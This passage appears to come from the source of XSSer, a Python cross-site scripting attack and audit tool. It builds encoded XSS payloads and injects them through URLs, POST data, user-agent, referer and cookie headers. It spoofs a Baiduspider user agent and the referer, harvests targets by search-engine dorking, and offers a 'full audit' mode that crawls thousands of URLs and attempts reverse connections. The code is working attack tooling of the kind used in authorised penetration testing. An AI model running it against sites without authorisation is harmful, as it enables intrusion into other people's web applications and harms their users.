  1570.                     if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1571. 

  1571.                         b64_string = payload["payload"].split("[B64]")
    1572. 

  1572.                         b64_string = b64_string[1]
    1573. 

  1573.                         b64_string = b64_string.replace('PAYLOAD', key)
    1574. 

  1574.                         b64_string = b64encode(b64_string)
    1575. 

  1575.                         b64_string = urllib.parse.urlencode({'':b64_string})
    1576. 

  1576.                         if b64_string.startswith("="):
    1577. 

  1577.                             b64_string = b64_string.replace("=", "")
    1578. 

  1578.                         if str(b64_string) in str(dest_url):
    1579. 

  1579.                             if key not in current_hashes:
    1580. 

  1580.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1581. 

  1581.                                 self.final_hashes[key] = value
    1582. 

  1582.                                 current_hashes.append(key)
    1583. 

  1583.                     else: # when using encoders (Str, Hex, Dec...)
    1584. 

  1584.                         payload_string = payload["payload"].replace("PAYLOAD", key)
    1585. 

  1585.                         hashed_payload = self.encoding_permutations(payload_string)
    1586. 

  1586.                         if self.options.Cem:
    1587. 

  1587.                             enc_perm = options.Cem.split(",")
    1588. 

  1588.                             for e in enc_perm:
    1589. 

  1589.                                 hashed_payload = self.encoding_permutations(payload_string)
    1590. 

  1590.                                 if e == "Str":
    1591. 

  1591.                                     hashed_payload = hashed_payload.replace(",", "%2C")
    1592. 

  1592.                                 if e == "Mix":
    1593. 

  1593.                                     hashed_payload=urllib.parse.quote(hashed_payload)
    1594. 

  1594.                                 if e == "Dec":
    1595. 

  1595.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1596. 

  1596.                                 if e == "Hex":
    1597. 

  1597.                                     hashed_payload = hashed_payload.replace("%", "%25")
    1598. 

  1598.                                 if e == "Hes":
    1599. 

  1599.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1600. 

  1600.                                     hashed_payload = hashed_payload.replace(";", "%3B")
    1601. 

  1601.                         else:
    1602. 

  1602.                             if self.options.Str:
    1603. 

  1603.                                 hashed_payload = hashed_payload.replace(",", "%2C")
    1604. 

  1604.                             if self.options.Mix:
    1605. 

  1605.                                 hashed_payload=urllib.parse.quote(hashed_payload)
    1606. 

  1606.                             if self.options.Dec:
    1607. 

  1607.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1608. 

  1608.                             if self.options.Hex:
    1609. 

  1609.                                 hashed_payload = hashed_payload.replace("%", "%25")
    1610. 

  1610.                             if self.options.Hes:
    1611. 

  1611.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1612. 

  1612.                                 hashed_payload = hashed_payload.replace(";", "%3B")
    1613. 

  1613.                         if str(hashed_payload) in str(dest_url): 
    1614. 

  1614.                             if key not in current_hashes:
    1615. 

  1615.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1616. 

  1616.                                 self.final_hashes[key] = value
    1617. 

  1617.                                 current_hashes.append(key)
    1618. 

  1618.             if self.extra_hashed_injections:
    1619. 

  1619.                 for k, v in self.extra_hashed_injections.items():
    1620. 

  1620.                     payload_url = str(v[1])
    1621. 

  1621.                     if payload_url == payload["payload"]:
    1622. 

  1622.                         if k not in current_hashes:
    1623. 

  1623.                             self.report(" [ " +k+" ] : [" , v[0] + " ]")
    1624. 

  1624.                             self.final_hashes[k] = v[0]
    1625. 

  1625.                             current_hashes.append(k)
    1626. 

  1626.             self.report("\n"+"-"*45+"\n")
    1627. 

  1627.         if payload['browser'] == "[Heuristic test]":
    1628. 

  1628.             self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
    1629. 

  1629.         else:
    1630. 

  1630.             if self.extra_hashed_injections:
    1631. 

  1631.                 extra_attacks=[]
    1632. 

  1632.                 if options.xsa:
    1633. 

  1633.                     extra_attacks.append("XSA")
    1634. 

  1634.                 if options.xsr:
    1635. 

  1635.                     extra_attacks.append("XSR")
    1636. 

  1636.                 if options.coo:
    1637. 

  1637.                     extra_attacks.append("COO")
    1638. 

  1638.                 if extra_attacks:
    1639. 

  1639.                     extra_attacks = "+ "+ str(extra_attacks)
    1640. 

  1640.                 if options.postdata:
    1641. 

  1641.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
    1642. 

  1642.                 else:
    1643. 

  1643.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
    1644. 

  1644.             else:
    1645. 

  1645.                 if options.postdata:
    1646. 

  1646.                     self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
    1647. 

  1647.                 else:
    1648. 

  1648.                     self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
    1649. 

  1649.             if not self.options.hash and not self.options.script:
    1650. 

  1650.                 if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
    1651. 

  1651.                     pass
    1652. 

  1652.                 else:
    1653. 

  1653.                     self.report("-"*45)
    1654. 

  1654.         if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
    1655. 

  1655.             pass
    1656. 

  1656.         else:
    1657. 

  1657.             if not "XSS" in dest_url or not "X1S" in dest_url:
    1658. 

  1658.                 if self.options.xsa or self.options.xsr or self.options.coo:
    1659. 

  1659.                     pass
    1660. 

  1660.                 else:
    1661. 

  1661.                     self.report("-"*45)
    1662. 

  1662.                     self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1663. 

  1663.                     if not self.options.verbose:
    1664. 

  1664.                         self.report("-"*45 + "\n")
    1665. 

  1665.             else:
    1666. 

  1666.                 self.report("-"*45)
    1667. 

  1667.                 self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1668. 

  1668.                 if not self.options.verbose:
    1669. 

  1669.                     self.report("-"*45 + "\n")
    1670. 

  1670.     	# statistics injections counters
    1671. 

  1671.         if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
    1672. 

  1672.             self.check_positives = self.check_positives + 1
    1673. 

  1673.         elif payload['browser']=="[Data Control Protocol Injection]":
    1674. 

  1674.             self.dcp_injection = self.dcp_injection + 1
    1675. 

  1675.         elif payload['browser']=="[Document Object Model Injection]":
    1676. 

  1676.             self.dom_injection = self.dom_injection + 1
    1677. 

  1677.         elif payload['browser']=="[Induced Injection]":
    1678. 

  1678.             self.httpsr_injection = self.httpsr_injection + 1
    1679. 

  1679.         elif payload['browser']=="[manual_injection]":
    1680. 

  1680.             self.manual_injection = self.manual_injection + 1
    1681. 

  1681.         else:
    1682. 

  1682.             self.auto_injection = self.auto_injection +1
    1683. 

  1683.         if not self.hashed_injections:
    1684. 

  1684.             for k, v in self.extra_hashed_injections.items():
    1685. 

  1685.                 if k in current_hashes:
    1686. 

  1686.                     if v[0] == "XSA":
    1687. 

  1687.                         agent = v[1]
    1688. 

  1688.                         agent = agent.replace("PAYLOAD", k)
    1689. 

  1689.                         Curl.agent = agent
    1690. 

  1690.                     if v[0] == "XSR":
    1691. 

  1691.                         referer = v[1]
    1692. 

  1692.                         referer = referer.replace("PAYLOAD", k)
    1693. 

  1693.                         Curl.referer = referer
    1694. 

  1694.                     if v[0] == "COO":
    1695. 

  1695.                         cookie = v[1]
    1696. 

  1696.                         cookie = cookie.replace("PAYLOAD", k)
    1697. 

  1697.                         Curl.cookie = cookie
    1698. 

  1698.         else:
    1699. 

  1699.             for key, value in self.hashed_injections.items():
    1700. 

  1700.                 for k, v in self.extra_hashed_injections.items():
    1701. 

  1701.                     payload_url = v[1]
    1702. 

  1702.                     payload_url = payload_url.replace("PAYLOAD",key)
    1703. 

  1703.                     payload_url = payload_url.replace(" ", "+") # black magic!
    1704. 

  1704.                     final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
    1705. 

  1705.                     if payload_url in final_dest_url:
    1706. 

  1706.                         if v[0] == "XSA":
    1707. 

  1707.                             agent = v[1]
    1708. 

  1708.                             agent = agent.replace("PAYLOAD", k)
    1709. 

  1709.                             Curl.agent = agent
    1710. 

  1710.                         if v[0] == "XSR":
    1711. 

  1711.                             referer = v[1]
    1712. 

  1712.                             referer = referer.replace("PAYLOAD", k)
    1713. 

  1713.                             Curl.referer = referer
    1714. 

  1714.                         if v[0] == "COO":
    1715. 

  1715.                             cookie = v[1]
    1716. 

  1716.                             cookie = cookie.replace("PAYLOAD", k)
    1717. 

  1717.                             Curl.cookie = cookie
    1718. 

  1718.                     else:
    1719. 

  1719.                         if k in current_hashes:
    1720. 

  1720.                             if v[0] == "XSA":
    1721. 

  1721.                                 agent = v[1]
    1722. 

  1722.                                 agent = agent.replace("PAYLOAD", k)
    1723. 

  1723.                                 Curl.agent = agent
    1724. 

  1724.                             if v[0] == "XSR":
    1725. 

  1725.                                 referer = v[1]
    1726. 

  1726.                                 referer = referer.replace("PAYLOAD", k)
    1727. 

  1727.                                 Curl.referer = referer
    1728. 

  1728.                             if v[0] == "COO":
    1729. 

  1729.                                 cookie = v[1]
    1730. 

  1730.                                 cookie = cookie.replace("PAYLOAD", k)
    1731. 

  1731.                                 Curl.cookie = cookie
    1732. 

  1732.         if options.verbose:
    1733. 

  1733.             self.report("-"*45)
    1734. 

  1734.             self.report("\n[+] HTTP Headers Verbose:\n")
    1735. 

  1735.             self.report(" [Client Request]")
    1736. 

  1736.             Curl.print_options()
    1737. 

  1737.             self.report(" [Server Reply]\n")
    1738. 

  1738.             self.report(curl_handle.info())
    1739. 

  1739.         self.report("="*45)
    1740. 

  1740.         self.report("[*] Injection(s) Results:")
    1741. 

  1741.         self.report("="*45 + "\n")
    1742. 

  1742.         if payload['browser']=="[Heuristic test]":
    1743. 

  1743.             for key, value in self.final_hashes.items():
    1744. 

  1744.                 if str(key) in dest_url:
    1745. 

  1745.                     heuristic_string = key
    1746. 

  1746.                     heuristic_param = str(payload['payload']).strip('XSS')
    1747. 

  1747.                     if heuristic_param == "\\":
    1748. 

  1748.                         self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
    1749. 

  1749.                     elif heuristic_param == "/":
    1750. 

  1750.                         self.heuris_slash_notfound = self.heuris_slash_notfound + 1
    1751. 

  1751.                     elif heuristic_param == ">":
    1752. 

  1752.                         self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
    1753. 

  1753.                     elif heuristic_param == "<":
    1754. 

  1754.                         self.heuris_minor_notfound = self.heuris_minor_notfound + 1
    1755. 

  1755.                     elif heuristic_param == ";":
    1756. 

  1756.                          self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
    1757. 

  1757.                     elif heuristic_param == "'":
    1758. 

  1758.                          self.heuris_colon_notfound = self.heuris_colon_notfound + 1
    1759. 

  1759.                     elif heuristic_param == '"':
    1760. 

  1760.                          self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
    1761. 

  1761.                     elif heuristic_param == "=":
    1762. 

  1762.                          self.heuris_equal_notfound = self.heuris_equal_notfound + 1
    1763. 

  1763.                     self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
    1764. 

  1764.         elif self.options.hash:
    1765. 

  1765.             for key, value in self.final_hashes.items():
    1766. 

  1766.                 self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
    1767. 

  1767.             self.report("\n" +"="*45)
    1768. 

  1768.         else:
    1769. 

  1769.             for key, value in self.final_hashes.items():
    1770. 

  1770.                 if "XSA" in value:
    1771. 

  1771.                     method = "xsa"
    1772. 

  1772.                     hashing = key
    1773. 

  1773.                 elif "XSR" in value:
    1774. 

  1774.                     method = "xsr"
    1775. 

  1775.                     hashing = key
    1776. 

  1776.                 elif "COO" in value:
    1777. 

  1777.                     method = "coo"
    1778. 

  1778.                     hashing = key
    1779. 

  1779.                 else:
    1780. 

  1780.                     method = "url"
    1781. 

  1781.                     hashing = key
    1782. 

  1782.                 if self.options.Str:
    1783. 

  1783.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1784. 

  1784.                     hashed_payload = self.encoding_permutations(payload_string)
    1785. 

  1785.                     hashed_payload = hashed_payload.replace(",", "%2C")
    1786. 

  1786.                     if str(hashed_payload) in str(dest_url):
    1787. 

  1787.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1788. 

  1788.                 elif self.options.Mix:
    1789. 

  1789.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1790. 

  1790.                     hashed_payload = self.encoding_permutations(payload_string)
    1791. 

  1791.                     hashed_payload=urllib.parse.quote(hashed_payload)
    1792. 

  1792.                     if str(hashed_payload) in str(dest_url):
    1793. 

  1793.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1794. 

  1794.                 elif self.options.Dec:
    1795. 

  1795.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1796. 

  1796.                     hashed_payload = self.encoding_permutations(payload_string)
    1797. 

  1797.                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1798. 

  1798.                     if str(hashed_payload) in str(dest_url):
    1799. 

  1799.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1800. 

  1800.                 elif self.options.Hex:
    1801. 

  1801.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1802. 

  1802.                     hashed_payload = self.encoding_permutations(payload_string)
    1803. 

  1803.                     hashed_payload = hashed_payload.replace("%", "%25")
    1804. 

  1804.                     if str(hashed_payload) in str(dest_url):
    1805. 

  1805.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1806. 

  1806.                 elif self.options.Hes:
    1807. 

  1807.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1808. 

  1808.                     hashed_payload = self.encoding_permutations(payload_string)
    1809. 

  1809.                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1810. 

  1810.                     hashed_payload = hashed_payload.replace(";", "%3B")
    1811. 

  1811.                     if str(hashed_payload) in str(dest_url):
    1812. 

  1812.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1813. 

  1813.                 else:
    1814. 

  1814.                     if self.options.Cem:
    1815. 

  1815.                         enc_perm = options.Cem.split(",")
    1816. 

  1816.                         payload_string = payload["payload"].replace("PAYLOAD", key)
    1817. 

  1817.                         for e in enc_perm:
    1818. 

  1818.                             hashed_payload = self.encoding_permutations(payload_string)
    1819. 

  1819.                             if str(e) == "Str":
    1820. 

  1820.                                 hashed_payload = hashed_payload.replace(",", "%2C")
    1821. 

  1821.                             if e == "Mix":
    1822. 

  1822.                                 hashed_payload=urllib.parse.quote(hashed_payload)
    1823. 

  1823.                             if e == "Dec":
    1824. 

  1824.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1825. 

  1825.                             if e == "Hex":
    1826. 

  1826.                                 hashed_payload = hashed_payload.replace("%", "%25")
    1827. 

  1827.                             if e == "Hes":
    1828. 

  1828.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1829. 

  1829.                                 hashed_payload = hashed_payload.replace(";", "%3B")
    1830. 

  1830.                         if str(hashed_payload) in str(dest_url):
    1831. 

  1831.                             self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1832. 

  1832.                     else:
    1833. 

  1833.                         if str(key) in str(dest_url):
    1834. 

  1834.                             self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1835. 

  1835.                         else:
    1836. 

  1836.                             if key in current_hashes:
    1837. 

  1837.                                 if method == "xsa":
    1838. 

  1838.                                     self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed!
    1839. 

  1839.                                 elif method == "xsr":
    1840. 

  1840.                                     self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed!
    1841. 

  1841.                                 elif method == "coo":
    1842. 

  1842.                                     self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed!
    1843. 

  1843.             self.report("\n" +"="*45)
    1844. 

  1844.         if str(curl_handle.info()["http-code"]) == "404":
    1845. 

  1845.             self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n")
    1846. 

  1846.         elif str(curl_handle.info()["http-code"]) == "403":
    1847. 

  1847.             self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
    1848. 

  1848.         elif str(curl_handle.info()["http-code"]) == "400":
    1849. 

  1849.             self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
    1850. 

  1850.         elif str(curl_handle.info()["http-code"]) == "401":
    1851. 

  1851.             self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n")
    1852. 

  1852.         elif str(curl_handle.info()["http-code"]) == "407":
    1853. 

  1853.             self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
    1854. 

  1854.         elif str(curl_handle.info()["http-code"]) == "408":
    1855. 

  1855.             self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
    1856. 

  1856.         elif str(curl_handle.info()["http-code"]) == "500":
    1857. 

  1857.             self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
    1858. 

  1858.         elif str(curl_handle.info()["http-code"]) == "501":
    1859. 

  1859.             self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
    1860. 

  1860.         elif str(curl_handle.info()["http-code"]) == "502":
    1861. 

  1861.             self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n")
    1862. 

  1862.         elif str(curl_handle.info()["http-code"]) == "503":
    1863. 

  1863.             self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n")
    1864. 

  1864.         elif str(curl_handle.info()["http-code"]) == "504":
    1865. 

  1865.             self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
    1866. 

  1866.         elif str(curl_handle.info()["http-code"]) == "0":
    1867. 

  1867.             self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
    1868. 

  1868.         else:
    1869. 

  1869.             self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
    1870. 

  1870.         if str(curl_handle.info()["http-code"]) == "404":
    1871. 

  1871.             self.not_connection = self.not_connection + 1
    1872. 

  1872.         elif str(curl_handle.info()["http-code"]) == "503":
    1873. 

  1873.             self.forwarded_connection = self.forwarded_connection + 1
    1874. 

  1874.         else:
    1875. 

  1875.             self.other_connection = self.other_connection + 1
    1876. 

  1876. 

  1877.     def check_positive(self, curl_handle, dest_url, payload, query_string):
    1878. 

  1878.         """
    1879. 

  1879.         Perform extra check for positives
    1880. 

  1880.         """
    1881. 

  1881.         body = curl_handle.body()
    1882. 

  1882.         pass
    1883. 

  1883. 

  1884.     def create_options(self, args=None):
    1885. 

  1885.         """
    1886. 

  1886.         Create options for OptionParser.
    1887. 

  1887.         """
    1888. 

  1888.         self.optionParser = XSSerOptions()
    1889. 

  1889.         self.options = self.optionParser.get_options(args)
    1890. 

  1890.         if not self.options:
    1891. 

  1891.             return False
    1892. 

  1892.         return self.options
    1893. 

  1893. 

  1894.     def _get_attack_urls(self):
    1895. 

  1895.         """
    1896. 

  1896.         Process payload options and make up the payload list for the attack.
    1897. 

  1897.         """
    1898. 

  1898.         urls = []
    1899. 

  1899.         options = self.options
    1900. 

  1900.         p = self.optionParser
    1901. 

  1901.         if options.imx:
    1902. 

  1902.             self.create_fake_image(options.imx, options.script)
    1903. 

  1903.             return []
    1904. 

  1904.         if options.flash:
    1905. 

  1905.             self.create_fake_flash(options.flash, options.script)
    1906. 

  1906.             return []
    1907. 

  1907.         if options.update:
    1908. 

  1908.             self.report('='*75)
    1909. 

  1909.             self.report(str(p.version))
    1910. 

  1910.             self.report('='*75)
    1911. 

  1911.             try:
    1912. 

  1912.                 print("\nTrying to update to the latest stable version...\n")
    1913. 

  1913.                 Updater() 
    1914. 

  1914.             except:
    1915. 

  1915.                 print("\nSomething was wrong!. You should clone XSSer manually with:\n")
    1916. 

  1916.                 print("$ git clone https://code.03c8.net/epsylon/xsser\n")
    1917. 

  1917. 

  1918.                 print("\nAlso you can try this other mirror:\n")
    1919. 

  1919.                 print("$ git clone https://github.com/epsylon/xsser\n")
    1920. 

  1920.             return []
    1921. 

  1921.         if options.wizard: # processing wizard template
    1922. 

  1922.            if self.user_template is not None:
    1923. 

  1923.                self.options.statistics = True # detailed output
    1924. 

  1924.                if self.user_template[0] == "DORKING": # mass-dorking
    1925. 

  1925.                    self.options.dork_file = True
    1926. 

  1926.                    self.options.dork_mass = True
    1927. 

  1927.                elif "http" in self.user_template[0]: # from target url
    1928. 

  1928.                    self.options.url = self.user_template[0]
    1929. 

  1929.                else: # from file
    1930. 

  1930.                    self.options.readfile = self.user_template[0]
    1931. 

  1931.                if self.user_template[1] == "CRAWLER": # crawlering target
    1932. 

  1932.                    self.options.crawling = "10"
    1933. 

  1933.                else: # manual payload (GET or POST)
    1934. 

  1934.                    if self.user_template_conntype == "GET":
    1935. 

  1935.                        self.options.getdata = self.user_template[1]
    1936. 

  1936.                    else:
    1937. 

  1937.                        self.options.postdata = self.user_template[1]
    1938. 

  1938.                if self.user_template[2] == "Proxy: No - Spoofing: Yes":
    1939. 

  1939.                    self.options.ignoreproxy = True
    1940. 

  1940.                    self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
    1941. 

  1941.                    self.options.referer = "127.0.0.1" # spoof referer
    1942. 

  1942.                elif self.user_template[2] == "Proxy: No - Spoofing: No":
    1943. 

  1943.                    self.options.ignoreproxy = True
    1944. 

  1944.                else: # using proxy + spoofing
    1945. 

  1945.                    self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
    1946. 

  1946.                    self.options.referer = "127.0.0.1" # spoof referer
    1947. 

  1947.                    if self.user_template[2] is not None:
    1948. 

  1948.                        self.options.proxy = self.user_template[2]
    1949. 

  1949.                    else:
    1950. 

  1950.                        self.options.ignoreproxy = True
    1951. 

  1951.                if self.user_template[3] == "Not using encoders":
    1952. 

  1952.                    pass
    1953. 

  1953.                elif self.user_template[3] == "Hex": # Hexadecimal
    1954. 

  1954.                    self.options.Hex = True
    1955. 

  1955.                elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
    1956. 

  1956.                    self.options.Str = True
    1957. 

  1957.                    self.options.Une = True
    1958. 

  1958.                else: # Character encoding mutations
    1959. 

  1959.                    self.options.Cem = self.user_template[3]
    1960. 

  1960.                if self.user_template[4] == "Alertbox": # Classic AlertBox injection
    1961. 

  1961.                    self.options.finalpayload = "<script>alert('XSS');</script>"
    1962. 

  1962.                else:
    1963. 

  1963.                    if self.user_template[4] is not None: # Inject user script
    1964. 

  1964.                        self.options.finalpayload = self.user_template[4]
    1965. 

  1965.                    else: # not final injection
    1966. 

  1966.                        pass 
    1967. 

  1967.            else: # exit
    1968. 

  1968.                return
    1969. 

  1969.         if options.target: # miau!
    1970. 

  1970.             self.report('='*75)
    1971. 

  1971.             self.report(str(p.version))
    1972. 

  1972.             self.report('='*75)
    1973. 

  1973.             self.report("Testing [Full XSS audit]... ;-)")
    1974. 

  1974.             self.report('='*75)
    1975. 

  1975.             self.report("\n[Info] The following actions will be performed at the end:\n")
    1976. 

  1976.             self.report("  1- Output with detailed statistics\n")
    1977. 

  1977.             self.report("  2- Export results to files: \n\n     - a) XSSreport.raw \n     - b) XSSer_<target>_<datetime>.xml\n")
    1978. 

  1978.             self.options.crawling = "99999" # set max num of urls to crawl
    1979. 

  1979.             self.options.crawler_width = "5" # set max num of deeping levels
    1980. 

  1980.             self.options.statistics = True # detailed output
    1981. 

  1981.             self.options.timeout = "60" # timeout
    1982. 

  1982.             self.options.retries = "2" # retries  
    1983. 

  1983.             self.options.delay = "5" # delay
    1984. 

  1984.             self.options.threads = "10" # threads
    1985. 

  1985.             self.options.followred = True # follow redirs
    1986. 

  1986.             self.options.nohead = False # HEAD check
    1987. 

  1987.             self.options.reversecheck = True # try to establish a reverse connection 
    1988. 

  1988.             self.options.fuzz = True # autofuzzing 
    1989. 

  1989.             self.options.coo = True # COO
    1990. 

  1990.             self.options.xsa = True # XSA
    1991. 

  1991.             self.options.xsr = True # XSR
    1992. 

  1992.             self.options.dcp = True # DCP
    1993. 

  1993.             self.options.dom = True # DOM
    1994. 

  1994.             self.options.inducedcode = True # Induced
    1995. 

  1995.             self.options.fileoutput = True # Important: export results to file (.raw)
    1996. 

  1996.             self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
    1997. 

  1997.             self.check_trace() # XST
    1998. 

  1998.             urls = [options.target]
    1999. 

  1999.         if options.url:
    2000. 

  2000.             self.report('='*75)
    2001. 

  2001.             self.report(str(p.version))
    2002. 

  2002.             self.report('='*75)
    2003. 

  2003.             if self.options.crawling:
    2004. 

  2004.                 self.report("Testing [XSS from CRAWLER]...")
    2005. 

  2005.             else:
    2006. 

  2006.                 self.report("Testing [XSS from URL]...")
    2007. 

  2007.             self.report('='*75)
    2008. 

  2008.             urls = [options.url]
    2009. 

  2009.         elif options.readfile:
    2010. 

  2010.             self.report('='*75)
    2011. 

  2011.             self.report(str(p.version))
    2012. 

  2012.             self.report('='*75)
    2013. 

  2013.             self.report("Testing [XSS from FILE]...")
    2014. 

  2014.             self.report('='*75)
    2015. 

  2015.             try:
    2016. 

  2016.                 f = open(options.readfile)
    2017. 

  2017.                 urls = f.readlines()
    2018. 

  2018.                 urls = [ line.replace('\n','') for line in urls ]
    2019. 

  2019.                 f.close()
    2020. 

  2020.             except:
    2021. 

  2021.                 import os.path
    2022. 

  2022.                 if os.path.exists(options.readfile) == True:
    2023. 

  2023.                     self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
    2024. 

  2024.                 else:
    2025. 

  2025.                     self.report('\nCannot found file: ', options.readfile, "\n")
    2026. 

  2026.         elif options.dork: # dork a query
    2027. 

  2027.             self.report('='*75)
    2028. 

  2028.             self.report(str(p.version))
    2029. 

  2029.             self.report('='*75)
    2030. 

  2030.             self.report("Testing [XSS from DORK]... Good luck! ;-)")
    2031. 

  2031.             self.report('='*75)
    2032. 

  2032.             if options.dork_mass: # massive dorkering
    2033. 

  2033.                 for e in self.search_engines:
    2034. 

  2034.                     try:
    2035. 

  2035.                         dorker = Dorker(e)
    2036. 

  2036.                         urls = dorker.dork(options.dork)
    2037. 

  2037.                         i = 0
    2038. 

  2038.                         for u in urls: # replace original parameter for injection keyword (XSS)
    2039. 

  2039.                             p_uri = urlparse(u)
    2040. 

  2040.                             uri = p_uri.netloc
    2041. 

  2041.                             path = p_uri.path
    2042. 

  2042.                             target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2043. 

  2043.                             for key, value in target_params.items(): # parse params to apply keywords
    2044. 

  2044.                                 for v in value:
    2045. 

  2045.                                     target_params[key] = 'XSS'
    2046. 

  2046.                             target_url_params = urllib.parse.urlencode(target_params)
    2047. 

  2047.                             u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2048. 

  2048.                             urls[i] = u
    2049. 

  2049.                             i = i + 1
    2050. 

  2050.                     except Exception as e:
    2051. 

  2051.                         for reporter in self._reporters:
    2052. 

  2052.                             reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2053. 

  2053.                     else:
    2054. 

  2054.                         if urls is not None:
    2055. 

  2055.                            for url in urls:
    2056. 

  2056.                                 for reporter in self._reporters:
    2057. 

  2057.                                     reporter.add_link(dorker.search_url, url)
    2058. 

  2058.             else:
    2059. 

  2059.                 if not options.dork_engine:
    2060. 

  2060.                     options.dork_engine = 'duck' # default search engine [26-08/2019]
    2061. 

  2061.                 dorker = Dorker(options.dork_engine)
    2062. 

  2062.                 try:
    2063. 

  2063.                     urls = dorker.dork(options.dork)
    2064. 

  2064.                     i = 0
    2065. 

  2065.                     for u in urls: # replace original parameter for injection keyword (XSS)
    2066. 

  2066.                         p_uri = urlparse(u)
    2067. 

  2067.                         uri = p_uri.netloc
    2068. 

  2068.                         path = p_uri.path
    2069. 

  2069.                         target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2070. 

  2070.                         for key, value in target_params.items(): # parse params to apply keywords
    2071. 

  2071.                             for v in value:
    2072. 

  2072.                                 target_params[key] = 'XSS'
    2073. 

  2073.                         target_url_params = urllib.parse.urlencode(target_params)
    2074. 

  2074.                         u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2075. 

  2075.                         urls[i] = u
    2076. 

  2076.                         i = i + 1
    2077. 

  2077.                 except Exception as e:
    2078. 

  2078.                     for reporter in self._reporters:
    2079. 

  2079.                         reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2080. 

  2080.                 else:
    2081. 

  2081.                     if urls is not None:
    2082. 

  2082.                         for url in urls:
    2083. 

  2083.                             for reporter in self._reporters:
    2084. 

  2084.                                 reporter.add_link(dorker.search_url, url)
    2085. 

  2085. 

  2086.         elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
    2087. 

  2087.             self.report('='*75)
    2088. 

  2088.             self.report(str(p.version))
    2089. 

  2089.             self.report('='*75)
    2090. 

  2090.             self.report("Testing [XSS from DORK]... Good luck! ;-)")
    2091. 

  2091.             self.report('='*75)
    2092. 

  2092.             try:
    2093. 

  2093.                 f = open('core/fuzzing/dorks.txt')
    2094. 

  2094.                 dorks = f.readlines()
    2095. 

  2095.                 dorks = [ dork.replace('\n','') for dork in dorks ]
    2096. 

  2096.                 f.close()
    2097. 

  2097.                 if not dorks:
